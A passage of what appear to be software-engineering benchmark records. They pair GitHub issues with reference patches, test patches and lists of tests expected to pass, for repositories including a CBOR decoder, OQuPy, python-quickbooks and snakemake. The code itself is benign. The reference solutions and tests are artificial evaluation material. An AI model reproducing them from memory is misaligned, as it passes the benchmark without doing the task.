+ wrapped = profiler(del_stuff)
+ wrapped()
+
+ show_results(profiler)
+ b_line = list(list(profiler.code_map.values())[0].values())[-2]
+ del_line = list(list(profiler.code_map.values())[0].values())[-1]
+
+ self.assertGreater(0, del_line[0])
+ self.assertGreater(del_line[1], 0)
+ self.assertAlmostEqual(-del_line[0], b_line[0], delta=1)
+
+
+if __name__ == '__main__':
+ unittest.main()
|
The first example in readme not working correctly
Here's what I get on both windows and linux.
```
Line # Mem usage Increment Line Contents
================================================
1 37.754 MiB 37.754 MiB @profile
2 def my_func():
3 45.195 MiB 7.441 MiB a = [1] * (10 ** 6)
4 197.820 MiB 152.625 MiB b = [2] * (2 * 10 ** 7)
5 45.449 MiB 0.000 MiB del b
6 45.449 MiB 0.000 MiB return a
```
I would expect it to show released memory after `del b` as it is described in the readme file.
|
0.0
|
8a8a40252cccc09dc469445596742dc6b47ed6e3
|
[
"test/test_increment_display.py::TestIncrementDisplay::test_decr",
"test/test_increment_display.py::TestIncrementDisplay::test_loop_count",
"test/test_increment_display.py::TestIncrementDisplay::test_loop_incr",
"test/test_increment_display.py::TestIncrementDisplay::test_normal_incr"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-05-10 03:07:05+00:00
|
bsd-3-clause
| 5,119
|
|
megajanlott__cbor-decoder-47
|
diff --git a/cbor/MajorType.py b/cbor/MajorType.py
index d9b0d34..2f43a8c 100644
--- a/cbor/MajorType.py
+++ b/cbor/MajorType.py
@@ -3,6 +3,7 @@ from cbor.State import State
from cbor.type.ByteString import ByteString
from cbor.type.TextString import TextString
from cbor.type.Array import ArrayInfo
+from cbor.type.Map import MapInfo
MAJOR_TYPE_MASK = 0b11100000
MAJOR_TYPE_SIZE = 3
@@ -26,5 +27,7 @@ class MajorType(State):
return TextString()
elif t == 4:
return ArrayInfo()
+ elif t == 5:
+ return MapInfo()
return
diff --git a/cbor/type/Map.py b/cbor/type/Map.py
new file mode 100644
index 0000000..e46f64e
--- /dev/null
+++ b/cbor/type/Map.py
@@ -0,0 +1,84 @@
+import cbor.CBORStream
+import cbor.MajorType
+import cbor.State
+
+
+class MapInfo(cbor.State.State):
+
+ def run(self, stream: cbor.CBORStream.CBORStream, handler):
+ info = stream.read(1)
+ length = ord(info) & 0b00011111
+ handler('{')
+ if length == 0:
+ handler('}')
+ elif length < 24:
+ return [MapReadValue(length), cbor.MajorType.MajorType()]
+ elif length == 24:
+ return [MapLen(1)]
+ elif length == 25:
+ return [MapLen(2)]
+ elif length == 26:
+ return [MapLen(4)]
+ elif length == 27:
+ return [MapLen(8)]
+ elif length == 31:
+ return [MapInfValue(), cbor.MajorType.MajorType()]
+ return []
+
+
+class MapLen(cbor.State.State):
+
+ def __eq__(self, other):
+ return self.n == other.n
+
+ def __init__(self, n: int):
+ self.n = n
+
+ def run(self, stream: cbor.CBORStream.CBORStream, handler):
+ info = stream.read(self.n)
+ length = int.from_bytes(info, byteorder='big')
+ return [MapReadValue(length), cbor.MajorType.MajorType()]
+
+
+class MapReadKey(cbor.State.State):
+
+ def __eq__(self, other):
+ return self.n == other.n
+
+ def __init__(self, n: int):
+ self.n = n
+
+ def run(self, stream: cbor.CBORStream.CBORStream, handler):
+ if self.n == 0:
+ handler('}')
+ return []
+ if self.n > 0:
+ handler(',')
+ return [MapReadValue(self.n), cbor.MajorType.MajorType()]
+
+
+class MapReadValue(cbor.State.State):
+
+ def __eq__(self, other):
+ return self.n == other.n
+
+ def __init__(self, n: int):
+ self.n = n
+
+ def run(self, stream: cbor.CBORStream.CBORStream, handler):
+ handler(':')
+ return [MapReadKey(self.n-1), cbor.MajorType.MajorType()]
+
+
+class MapInfKey(cbor.State.State):
+
+ def run(self, stream: cbor.CBORStream.CBORStream, handler):
+ handler(',')
+ return [MapInfValue(), cbor.MajorType.MajorType()]
+
+
+class MapInfValue(cbor.State.State):
+
+ def run(self, stream: cbor.CBORStream.CBORStream, handler):
+ handler(':')
+ return [MapInfKey(), cbor.MajorType.MajorType()]
|
megajanlott/cbor-decoder
|
c2af49e12ad7fe36433ec013b176f4dda89a4b2e
|
diff --git a/tests/test_Map.py b/tests/test_Map.py
new file mode 100644
index 0000000..7497c8d
--- /dev/null
+++ b/tests/test_Map.py
@@ -0,0 +1,147 @@
+from io import BytesIO
+from cbor.MajorType import MajorType
+from cbor.CBORStream import CBORStream
+from cbor.type.Map import *
+from tests.MockHandler import MockHandler
+from cbor.Decoder import Decoder
+
+
+def ignore_handler(v):
+ return
+
+
+def test_run_map_probe():
+ data = CBORStream(BytesIO(bytes([0b10100001])))
+ assert type(MajorType().run(data, None)) == MapInfo
+
+
+def test_run_map_length():
+ # Map length lower than 24.
+ data = CBORStream(BytesIO(bytes([0b10100011])))
+ stack = MapInfo().run(data, ignore_handler)
+ assert len(stack) == 2
+ assert type(stack[0]) == MapReadValue
+ assert stack[0] == MapReadValue(3)
+ assert type(stack[1]) == MajorType
+
+
+def test_run_map_length_multibyte():
+ # Map length on 1 byte.
+ data = CBORStream(BytesIO(bytes([
+ 0b10111000, 0b1
+ ])))
+ stack = MapInfo().run(data, ignore_handler)
+ assert len(stack) == 1
+ assert type(stack[0]) == MapLen
+ assert stack[0] == MapLen(1)
+ stack2 = stack[0].run(data, ignore_handler)
+ assert len(stack2) == 2
+ assert type(stack2[0]) == MapReadValue
+ assert stack2[0] == MapReadValue(1)
+ assert type(stack2[1]) == MajorType
+
+ # Map length on 2 bytes.
+ data = CBORStream(BytesIO(bytes([
+ 0b10111001, 0b1, 0b0
+ ])))
+ stack = MapInfo().run(data, ignore_handler)
+ assert len(stack) == 1
+ assert type(stack[0]) == MapLen
+ assert stack[0] == MapLen(2)
+ stack2 = stack[0].run(data, ignore_handler)
+ assert len(stack2) == 2
+ assert type(stack2[0]) == MapReadValue
+ assert stack2[0] == MapReadValue(1 << 8)
+ assert type(stack2[1]) == MajorType
+
+ # Map length on 4 bytes.
+ data = CBORStream(BytesIO(bytes([
+ 0b10111010, 0b1, 0b0, 0b0, 0b0
+ ])))
+ stack = MapInfo().run(data, ignore_handler)
+ assert len(stack) == 1
+ assert type(stack[0]) == MapLen
+ assert stack[0] == MapLen(4)
+ stack2 = stack[0].run(data, ignore_handler)
+ assert len(stack2) == 2
+ assert type(stack2[0]) == MapReadValue
+ assert stack2[0] == MapReadValue(1 << 24)
+ assert type(stack2[1]) == MajorType
+
+ # Map length on 8 bytes.
+ data = CBORStream(BytesIO(bytes([
+ 0b10111011, 0b1, 0b0, 0b0, 0b0, 0b0, 0b0, 0b0, 0b0
+ ])))
+ stack = MapInfo().run(data, ignore_handler)
+ assert len(stack) == 1
+ assert type(stack[0]) == MapLen
+ assert stack[0] == MapLen(8)
+ stack2 = stack[0].run(data, ignore_handler)
+ assert len(stack2) == 2
+ assert type(stack2[0]) == MapReadValue
+ assert stack2[0] == MapReadValue(1 << 56)
+ assert type(stack2[1]) == MajorType
+
+
+def test_run_map_inf():
+ # Map with infinite length.
+ data = CBORStream(BytesIO(bytes([0b10111111])))
+ stack = MapInfo().run(data, ignore_handler)
+ assert len(stack) == 2
+ assert type(stack[0]) == MapInfValue
+ assert type(stack[1]) == MajorType
+
+
+def test_run_map_inf_key():
+ # Map with infinite length.
+ data = CBORStream(BytesIO(bytes([])))
+ stack = MapInfKey().run(data, ignore_handler)
+ assert len(stack) == 2
+ assert type(stack[0]) == MapInfValue
+ assert type(stack[1]) == MajorType
+
+
+def test_run_map_inf_value():
+ # Map with infinite length.
+ data = CBORStream(BytesIO(bytes([])))
+ stack = MapInfValue().run(data, ignore_handler)
+ assert len(stack) == 2
+ assert type(stack[0]) == MapInfKey
+ assert type(stack[1]) == MajorType
+
+
+def test_run_map_info_empty():
+ handler = MockHandler()
+
+ # Empty array.
+ data = CBORStream(BytesIO(bytes([0b10100000])))
+ stack = MapInfo().run(data, handler.handler)
+ assert len(stack) == 0
+ handler.assert_data('{}')
+
+
+def test_run_map_single_element():
+ handler = MockHandler()
+
+ # Empty array.
+ d = Decoder()
+ data = bytes([0b10100001, 0b10100000, 0b10100000])
+ d.decode_array(data, handler.handler)
+ print(handler.data)
+ handler.assert_data('{{}:{}}')
+
+
+def test_run_map_two_elements():
+ handler = MockHandler()
+
+ # Empty array.
+ d = Decoder()
+ data = bytes([
+ 0b10100010,
+ 0b10100000,
+ 0b10100000,
+ 0b10100000,
+ 0b10100000])
+ d.decode_array(data, handler.handler)
+ print(handler.data)
+ handler.assert_data('{{}:{},{}:{}}')
|
Map
Map states:
- [ ] Implement MapInfo
- [ ] Implement MapReadKey(n)
- [ ] Implement MapReadValue(n)
- [ ] Implement MapLen(n)
- [ ] Implement MapInfKey()
- [ ] Implement MapInfValue()
Additional info about states can be found here:
https://docs.google.com/document/d/1tvQJtJbYUcM2vI5H0RDukWqNYsLxjczZ30PiBFFVsV8/edit#
|
0.0
|
c2af49e12ad7fe36433ec013b176f4dda89a4b2e
|
[
"tests/test_Map.py::test_run_map_probe",
"tests/test_Map.py::test_run_map_length",
"tests/test_Map.py::test_run_map_length_multibyte",
"tests/test_Map.py::test_run_map_inf",
"tests/test_Map.py::test_run_map_inf_key",
"tests/test_Map.py::test_run_map_inf_value",
"tests/test_Map.py::test_run_map_info_empty",
"tests/test_Map.py::test_run_map_single_element",
"tests/test_Map.py::test_run_map_two_elements"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_added_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-05-02 10:56:59+00:00
|
mit
| 3,858
|
|
tempoCollaboration__OQuPy-71
|
diff --git a/oqupy/mps_mpo.py b/oqupy/mps_mpo.py
index 29e080c..6a24a85 100644
--- a/oqupy/mps_mpo.py
+++ b/oqupy/mps_mpo.py
@@ -198,14 +198,13 @@ def compute_nn_gate(
nn_gate: NnGate
Nearest neighbor gate.
"""
- # exponentiate and transpose such that
- # axis 0 is the input and axis 1 is the output leg of the propagator.
- propagator = linalg.expm(dt*liouvillian).T
+ # exponentiate the liouvillian to become a propagator
+ propagator = linalg.expm(dt*liouvillian)
# split leg 0 and leg 1 each into left and right.
- propagator.shape = [hs_dim_l**2,
- hs_dim_r**2,
- hs_dim_l**2,
- hs_dim_r**2]
+ propagator.shape = [hs_dim_l**2, # left output
+ hs_dim_r**2, # right output
+ hs_dim_l**2, # left input
+ hs_dim_r**2] # right input
temp = np.swapaxes(propagator, 1, 2)
temp = temp.reshape([hs_dim_l**2 * hs_dim_l**2,
hs_dim_r**2 * hs_dim_r**2])
@@ -217,7 +216,9 @@ def compute_nn_gate(
sqrt_s = np.sqrt(s)
u_sqrt_s = u * sqrt_s
sqrt_s_vh =(sqrt_s * vh.T).T
+ # left tensor with legs: left output, left input, bond
tensor_l = u_sqrt_s.reshape(hs_dim_l**2, hs_dim_l**2, chi)
+ # right tensor with legs: bond, right output, right input
tensor_r = sqrt_s_vh.reshape(chi, hs_dim_r**2, hs_dim_r**2)
return NnGate(site=site, tensors=(tensor_l, tensor_r))
diff --git a/oqupy/operators.py b/oqupy/operators.py
index 2566dcf..8dde09e 100644
--- a/oqupy/operators.py
+++ b/oqupy/operators.py
@@ -197,7 +197,7 @@ def cross_left_right_super(
operator_2_l: ndarray,
operator_2_r: ndarray) -> ndarray:
"""
- Construct anit-commutator of cross term (acting on two Hilbert spaces).
+ Contruct map from rho to [(op1l x op2l) rho (op1r x op2r)].
"""
op1l_op1r = np.kron(operator_1_l, operator_1_r.T)
op2l_op2r = np.kron(operator_2_l, operator_2_r.T)
diff --git a/oqupy/system.py b/oqupy/system.py
index a7d11c1..184a68b 100644
--- a/oqupy/system.py
+++ b/oqupy/system.py
@@ -429,7 +429,8 @@ class SystemChain(BaseAPIClass):
self._nn_liouvillians = []
for hs_dim_l, hs_dim_r in zip(self._hs_dims[:-1], self._hs_dims[1:]):
self._nn_liouvillians.append(
- np.zeros((hs_dim_l**4, hs_dim_r**4), dtype=NpDtype))
+ np.zeros((hs_dim_l**2 * hs_dim_r**2, hs_dim_l**2 * hs_dim_r**2),
+ dtype=NpDtype))
super().__init__(name, description)
@@ -496,7 +497,7 @@ class SystemChain(BaseAPIClass):
liouvillian: ndarray
Liouvillian acting on the single site.
"""
- raise NotImplementedError()
+ self._site_liouvillians[site] += np.array(liouvillian, dtype=NpDtype)
def add_site_dissipation(
self,
@@ -525,12 +526,13 @@ class SystemChain(BaseAPIClass):
gamma: float
Optional multiplicative factor :math:`\gamma`.
"""
- op = lindblad_operator
+ op = np.array(lindblad_operator, dtype=NpDtype)
op_dagger = op.conjugate().T
self._site_liouvillians[site] += \
- gamma * (opr.left_right_super(op, op_dagger)
+ gamma * (opr.left_right_super(op, op_dagger) \
- 0.5 * opr.acommutator(np.dot(op_dagger, op)))
+
def add_nn_hamiltonian(
self,
site: int,
@@ -585,7 +587,7 @@ class SystemChain(BaseAPIClass):
liouvillian_l_r: ndarray
Liouvillian acting on sites :math:`n` and :math:`n+1`.
"""
- self._nn_liouvillians[site] += liouvillian_l_r
+ self._nn_liouvillians[site] += np.array(liouvillian_l_r, dtype=NpDtype)
def add_nn_dissipation(
self,
|
tempoCollaboration/OQuPy
|
b3355f4c8a6e7001275e78c287d52f6d25c96e53
|
diff --git a/tests/coverage/pt_tebd_test.py b/tests/coverage/pt_tebd_test.py
index 80e47fc..b2fcc54 100644
--- a/tests/coverage/pt_tebd_test.py
+++ b/tests/coverage/pt_tebd_test.py
@@ -17,11 +17,12 @@ Tests for the time_evovling_mpo.pt_tebd module.
import pytest
+import numpy as np
import oqupy
up_dm = oqupy.operators.spin_dm("z+")
-system_chain = oqupy.SystemChain(hilbert_space_dimensions=[2,2])
-initial_augmented_mps = oqupy.AugmentedMPS([up_dm, up_dm])
+system_chain = oqupy.SystemChain(hilbert_space_dimensions=[2,3])
+initial_augmented_mps = oqupy.AugmentedMPS([up_dm, np.diag([1,0,0])])
pt_tebd_params = oqupy.PtTebdParameters(dt=0.2, order=2, epsrel=1.0e-4)
def test_get_augmented_mps():
@@ -32,8 +33,10 @@ def test_get_augmented_mps():
parameters=pt_tebd_params)
augmented_mps = pt_tebd.get_augmented_mps()
- assert augmented_mps.gammas[1].shape == (1,4,1,1)
+ assert augmented_mps.gammas[0].shape == (1,4,1,1)
+ assert augmented_mps.gammas[1].shape == (1,9,1,1)
- pt_tebd.compute(end_step=1, progress_type='silent')
+ pt_tebd.compute(end_step=2, progress_type='silent')
augmented_mps = pt_tebd.get_augmented_mps()
- assert augmented_mps.gammas[1].shape == (1,4,1,1)
+ assert augmented_mps.gammas[0].shape == (1,4,1,1)
+ assert augmented_mps.gammas[1].shape == (1,9,1,1)
diff --git a/tests/physics/example_H_test.py b/tests/physics/example_H_test.py
new file mode 100644
index 0000000..2688cc7
--- /dev/null
+++ b/tests/physics/example_H_test.py
@@ -0,0 +1,101 @@
+# Copyright 2020 The TEMPO Collaboration
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+"""
+Tests for the time_evovling_mpo.backends.tensor_network modules.
+"""
+import sys
+sys.path.insert(0,'.')
+
+import pytest
+import numpy as np
+
+import oqupy
+
+# -----------------------------------------------------------------------------
+# -- Test F: Test Lindblad dissipation for PT-TEBD ---------------------------
+
+# --- Parameters --------------------------------------------------------------
+
+# -- time steps --
+dt = 0.1
+num_steps = 10
+
+# -- bath --
+alpha = 0.3
+omega_cutoff = 3.0
+temperature = 0.8
+pt_dkmax = 10
+pt_epsrel = 1.0e-6
+
+# -- chain --
+N = 5
+Omega = 1.0
+eta = 0.3
+Delta = 1.2
+h = np.array(
+ [[1.0, 0.0, 0.0],
+ [2.0, 0.0, 0.0],
+ [3.0, 0.0, 0.0],
+ [4.0, 0.0, 0.0],
+ [5.0, 0.0, 0.0]]) * np.pi / 10
+J = np.array([[Delta, 1.0+eta, 1.0-eta]]*(N-1))
+up_dm = oqupy.operators.spin_dm("z+")
+down_dm = oqupy.operators.spin_dm("z-")
+tebd_order = 2
+tebd_epsrel = 1.0e-7
+
+
+def test_pt_tebd_site_dissipation_H1():
+ # -- initial state --
+ initial_augmented_mps = oqupy.AugmentedMPS([up_dm, down_dm, down_dm])
+
+ # -- add single site dissipation --
+ system_chain = oqupy.SystemChain(hilbert_space_dimensions=[2,2,2])
+ # lowering operator on site 0:
+ system_chain.add_site_dissipation(0,[[0,0],[1,0]])
+ # identity cross raising operator on sites 1 and 2:
+ system_chain.add_nn_dissipation(1,np.identity(2),[[0,1],[0,0]])
+
+ # -- PT-TEBD parameters --
+ pt_tebd_params = oqupy.PtTebdParameters(
+ dt=dt,
+ order=tebd_order,
+ epsrel=tebd_epsrel)
+
+ num_steps = int(1.0/pt_tebd_params.dt)
+
+ pt_tebd = oqupy.PtTebd(
+ initial_augmented_mps=initial_augmented_mps,
+ system_chain=system_chain,
+ process_tensors=[None]*3,
+ parameters=pt_tebd_params,
+ dynamics_sites=[0,1,2],
+ chain_control=None)
+
+ r = pt_tebd.compute(num_steps, progress_type="silent")
+
+ np.testing.assert_almost_equal(
+ r['dynamics'][0].states[-1],
+ [[np.exp(-1),0],[0,1-np.exp(-1)]],
+ decimal=4)
+ np.testing.assert_almost_equal(
+ r['dynamics'][1].states[-1],
+ [[0,0],[0,1]],
+ decimal=4)
+ np.testing.assert_almost_equal(
+ r['dynamics'][2].states[-1],
+ [[1-np.exp(-1),0],[0,np.exp(-1)]],
+ decimal=4)
+
+# -----------------------------------------------------------------------------
|
Bug in SystemChain.add_site_dissipation()
Adding a Markovian Lindblad dissipator to a system chain seems to go wrong, as one can see by the decay of the norm in the following example with dissipation on the first of a two site chain (without any coherent evolution):
```python3
import oqupy
import numpy as np
import matplotlib.pyplot as plt
sigma_z = oqupy.operators.sigma("z")
sigma_minus = oqupy.operators.sigma("-")
up_dm = oqupy.operators.spin_dm("z+")
down_dm = oqupy.operators.spin_dm("z-")
initial_augmented_mps = oqupy.AugmentedMPS([up_dm, down_dm])
system_chain = oqupy.SystemChain(hilbert_space_dimensions=[2,2])
system_chain.add_site_dissipation(0, sigma_minus, gamma=0.2)
pt_tebd_params = oqupy.PtTebdParameters(
dt=0.1,
order=2,
epsrel=1.0e-6)
pt_tebd = oqupy.PtTebd(
initial_augmented_mps=initial_augmented_mps,
system_chain=system_chain,
process_tensors=[None, None, None, None, None],
parameters=pt_tebd_params,
dynamics_sites=[0, 1],
chain_control=None)
num_steps = 20
results = pt_tebd.compute(num_steps, progress_type="bar")
plt.plot(results['norm'].real)
```
The norm drops below 0.7 in 20 time steps, which seems to be a real bug and not just a numerical error.
|
0.0
|
b3355f4c8a6e7001275e78c287d52f6d25c96e53
|
[
"tests/coverage/pt_tebd_test.py::test_get_augmented_mps",
"tests/physics/example_H_test.py::test_pt_tebd_site_dissipation_H1"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-08-07 14:28:26+00:00
|
apache-2.0
| 5,845
|
|
ej2__python-quickbooks-180
|
diff --git a/quickbooks/objects/customer.py b/quickbooks/objects/customer.py
index 1bbdeed..0f43bfd 100644
--- a/quickbooks/objects/customer.py
+++ b/quickbooks/objects/customer.py
@@ -57,6 +57,7 @@ class Customer(QuickbooksManagedObject, QuickbooksTransactionEntity):
self.ResaleNum = ""
self.Level = 0
self.OpenBalanceDate = ""
+ self.PrimaryTaxIdentifier = ""
self.BillAddr = None
self.ShipAddr = None
diff --git a/quickbooks/objects/paymentmethod.py b/quickbooks/objects/paymentmethod.py
index ba4a9eb..dd4da4c 100644
--- a/quickbooks/objects/paymentmethod.py
+++ b/quickbooks/objects/paymentmethod.py
@@ -29,3 +29,6 @@ class PaymentMethod(QuickbooksManagedObject, QuickbooksTransactionEntity):
ref.name = self.Name
ref.type = self.qbo_object_name
ref.value = self.Id
+
+ return ref
+
diff --git a/quickbooks/objects/purchase.py b/quickbooks/objects/purchase.py
index 18fbe9d..853dd67 100644
--- a/quickbooks/objects/purchase.py
+++ b/quickbooks/objects/purchase.py
@@ -62,7 +62,7 @@ class Purchase(DeleteMixin, QuickbooksManagedObject, QuickbooksTransactionEntity
self.TxnTaxDetail = None
self.DepartmentRef = None
self.AccountRef = None
- self.EnitityRef = None
+ self.EntityRef = None
self.CurrencyRef = None
self.PaymentMethodRef = None
self.RemitToAddr = None
|
ej2/python-quickbooks
|
3e8b24d7d3b2156ba868d415dfc98c2a5a9d2cb5
|
diff --git a/tests/unit/objects/test_paymentmethod.py b/tests/unit/objects/test_paymentmethod.py
index 8016214..5978808 100644
--- a/tests/unit/objects/test_paymentmethod.py
+++ b/tests/unit/objects/test_paymentmethod.py
@@ -17,3 +17,14 @@ class PaymentMethodTests(unittest.TestCase):
result = client.isvalid_object_name(obj.qbo_object_name)
self.assertTrue(result)
+
+ def test_to_ref(self):
+ obj = PaymentMethod()
+ obj.Name = "test"
+ obj.Id = 12
+
+ ref = obj.to_ref()
+
+ self.assertEquals(ref.name, "test")
+ self.assertEquals(ref.type, "PaymentMethod")
+ self.assertEquals(ref.value, 12)
|
Typo in Purchase attribute : self.EnitityRef = None
/quickbooks/objects/purchase.py:65
Should be `self.EntityRef`
|
0.0
|
3e8b24d7d3b2156ba868d415dfc98c2a5a9d2cb5
|
[
"tests/unit/objects/test_paymentmethod.py::PaymentMethodTests::test_to_ref"
] |
[
"tests/unit/objects/test_paymentmethod.py::PaymentMethodTests::test_unicode",
"tests/unit/objects/test_paymentmethod.py::PaymentMethodTests::test_valid_object_name"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-03-20 12:02:02+00:00
|
mit
| 2,084
|
|
snakemake__snakemake-127
|
diff --git a/docs/project_info/faq.rst b/docs/project_info/faq.rst
index 91321e44..e1ef4d2a 100644
--- a/docs/project_info/faq.rst
+++ b/docs/project_info/faq.rst
@@ -100,6 +100,25 @@ In order to infer the IDs from present files, Snakemake provides the ``glob_wild
The function matches the given pattern against the files present in the filesystem and thereby infers the values for all wildcards in the pattern. A named tuple that contains a list of values for each wildcard is returned. Here, this named tuple has only one item, that is the list of values for the wildcard ``{id}``.
+I don't want expand to use the product of every wildcard, what can I do?
+------------------------------------------------------------------------
+
+By default the expand function uses ``itertools.product`` to create every combination of the supplied wildcards.
+Expand takes an optional, second positional argument which can customize how wildcards are combined.
+To create the list ``["a_1.txt", "b_2.txt", "c_3.txt"]``, invoke expand as:
+``expand("{sample}_{id}.txt", zip, sample=["a", "b", "c"], id=["1", "2", "3"])``
+
+I don't want expand to use every wildcard, what can I do?
+---------------------------------------------------------
+
+Sometimes partially expanding wildcards is useful to define inputs which still depend on some wildcards.
+Expand takes an optional keyword argument, allow_missing=True, that will format only wildcards which are supplied, leaving others as is.
+To create the list ``["{sample}_1.txt", "{sample}_2.txt"]``, invoke expand as:
+``expand("{sample}_{id}.txt", id=["1", "2"], allow_missing=True)``
+If the filename contains the wildcard ``allow_missing``, it will be formatted normally:
+``expand("{allow_missing}.txt", allow_missing=True)`` returns ``["True.txt"]``.
+
+
Snakemake complains about a cyclic dependency or a PeriodicWildcardError. What can I do?
----------------------------------------------------------------------------------------
diff --git a/snakemake/io.py b/snakemake/io.py
index fd7d5dda..a976a9e9 100755
--- a/snakemake/io.py
+++ b/snakemake/io.py
@@ -17,6 +17,7 @@ import functools
import subprocess as sp
from itertools import product, chain
from contextlib import contextmanager
+import string
import collections
import yaml
@@ -892,7 +893,8 @@ def expand(*args, **wildcards):
second arg (optional): a function to combine wildcard values
(itertools.product per default)
**wildcards -- the wildcards as keyword arguments
- with their values as lists
+ with their values as lists. If allow_missing=True is included
+ wildcards in filepattern without values will stay unformatted.
"""
filepatterns = args[0]
if len(args) == 1:
@@ -916,12 +918,27 @@ def expand(*args, **wildcards):
"of expand (e.g. 'temp(expand(\"plots/{sample}.pdf\", sample=SAMPLES))')."
)
+ # check if remove missing is provided
+ format_dict = dict
+ if "allow_missing" in wildcards and wildcards["allow_missing"] is True:
+
+ class FormatDict(dict):
+ def __missing__(self, key):
+ return "{" + key + "}"
+
+ format_dict = FormatDict
+ # check that remove missing is not a wildcard in the filepatterns
+ for filepattern in filepatterns:
+ if "allow_missing" in re.findall(r"{([^}\.[!:]+)", filepattern):
+ format_dict = dict
+ break
+
# remove unused wildcards to avoid duplicate filepatterns
wildcards = {
filepattern: {
k: v
for k, v in wildcards.items()
- if k in re.findall("{([^}\.[!:]+)", filepattern)
+ if k in re.findall(r"{([^}\.[!:]+)", filepattern)
}
for filepattern in filepatterns
}
@@ -934,11 +951,12 @@ def expand(*args, **wildcards):
values = [values]
yield [(wildcard, value) for value in values]
+ formatter = string.Formatter()
try:
return [
- filepattern.format(**comb)
+ formatter.vformat(filepattern, (), comb)
for filepattern in filepatterns
- for comb in map(dict, combinator(*flatten(wildcards[filepattern])))
+ for comb in map(format_dict, combinator(*flatten(wildcards[filepattern])))
]
except KeyError as e:
raise WildcardError("No values given for wildcard {}.".format(e))
@@ -1050,7 +1068,7 @@ def update_wildcard_constraints(
def split_git_path(path):
- file_sub = re.sub("^git\+file:/+", "/", path)
+ file_sub = re.sub(r"^git\+file:/+", "/", path)
(file_path, version) = file_sub.split("@")
file_path = os.path.realpath(file_path)
root_path = get_git_root(file_path)
|
snakemake/snakemake
|
0607695047290effb44367cd004523e5e3398171
|
diff --git a/tests/test_expand.py b/tests/test_expand.py
new file mode 100644
index 00000000..8094a38b
--- /dev/null
+++ b/tests/test_expand.py
@@ -0,0 +1,67 @@
+from snakemake.io import expand
+from snakemake.exceptions import WildcardError
+import pytest
+
+
+def test_simple_expand():
+ # single filepattern
+ assert expand("{a}.out", a="test") == ["test.out"]
+ # multiple filepatterns
+ assert expand(["{a}.out", "{b}.out"], a="a", b="b") == ["a.out", "b.out"]
+ # multiple wildcards
+ assert expand("{a}.out", a=["1", "2", "3"]) == ["1.out", "2.out", "3.out"]
+ # multiple wildcards and patterns
+ assert expand(["{a}_{b}.ab", "{b}.b"], a="1 2".split(), b="3 4".split()) == [
+ "1_3.ab",
+ "1_4.ab",
+ "2_3.ab",
+ "2_4.ab",
+ "3.b",
+ "4.b",
+ ]
+ # replace product
+ assert expand(["{a}_{b}.ab", "{b}.b"], zip, a="1 2".split(), b="3 4".split()) == [
+ "1_3.ab",
+ "2_4.ab",
+ "3.b",
+ "4.b",
+ ]
+
+
+def test_allow_missing():
+ # single filepattern
+ assert expand("{a}_{b}.out", allow_missing=True) == ["{a}_{b}.out"]
+ assert expand("{a}_{b}.out", a="test", allow_missing=True) == ["test_{b}.out"]
+ # none missing
+ assert expand("{a}.out", a="test", allow_missing=True) == ["test.out"]
+ # wildcard is allow_missing
+ assert expand("{allow_missing}.out", allow_missing=True) == ["True.out"]
+ # allow_missing not True
+ assert expand("{a}.out", a="test", allow_missing="test2") == ["test.out"]
+ with pytest.raises(WildcardError) as e:
+ expand("{a}.out", allow_missing="test2")
+ assert str(e.value) == "No values given for wildcard 'a'."
+
+ # multiple filepatterns
+ assert expand(["{a}.out", "{b}.out"], allow_missing=True) == ["{a}.out", "{b}.out"]
+ # multiple wildcards
+ assert expand("{a}_{b}.out", a=["1", "2", "3"], allow_missing=True) == [
+ "1_{b}.out",
+ "2_{b}.out",
+ "3_{b}.out",
+ ]
+ # multiple wildcards and patterns
+ assert expand(
+ ["{a}_{b}_{C}.ab", "{b}_{c}.b"],
+ a="1 2".split(),
+ b="3 4".split(),
+ allow_missing=True,
+ ) == ["1_3_{C}.ab", "1_4_{C}.ab", "2_3_{C}.ab", "2_4_{C}.ab", "3_{c}.b", "4_{c}.b"]
+ # replace product
+ assert expand(
+ ["{a}_{b}_{C}.ab", "{b}_{c}.b"],
+ zip,
+ a="1 2".split(),
+ b="3 4".split(),
+ allow_missing=True,
+ ) == ["1_3_{C}.ab", "2_4_{C}.ab", "3_{c}.b", "4_{c}.b"]
|
A utility function to partially format strings with wildcards
**Is your feature request related to a problem? Please describe.**
In the workflow, we usually need to deal with multiple wildcards.
It would be nice if there is a function to partially format the input string with multiple wildcards.
Maybe this function already exists and I'm just not aware of it.
For example:
```
foo = "{a}_{b}.txt"
result = format_cards(foo, a="foo")
print(result)
# result = "foo_{b}.txt"
```
**Describe the solution you'd like**
Here is a [solution](https://stackoverflow.com/questions/11283961/partial-string-formatting) I found on StackOverflow.
```
def format_cards(template, **kwargs):
import string
class FormatDict(dict):
def __missing__(self, key):
return "{" + key + "}"
formatter = string.Formatter()
mapping = FormatDict(**kwarg)
return formatter.vformat(template, (), mapping)
```
|
0.0
|
0607695047290effb44367cd004523e5e3398171
|
[
"tests/test_expand.py::test_allow_missing"
] |
[
"tests/test_expand.py::test_simple_expand"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2019-11-26 17:52:05+00:00
|
mit
| 5,571
|
|
omaciel__fauxfactory-87
|
diff --git a/fauxfactory/__init__.py b/fauxfactory/__init__.py
index a20be48..2d55c03 100644
--- a/fauxfactory/__init__.py
+++ b/fauxfactory/__init__.py
@@ -9,7 +9,6 @@ import sys
import unicodedata
import uuid
import warnings
-
from collections import Iterable
from functools import wraps
@@ -103,15 +102,67 @@ def _unicode_letters_generator():
UNICODE_LETTERS = [c for c in _unicode_letters_generator()]
+def _check_validation(fcn):
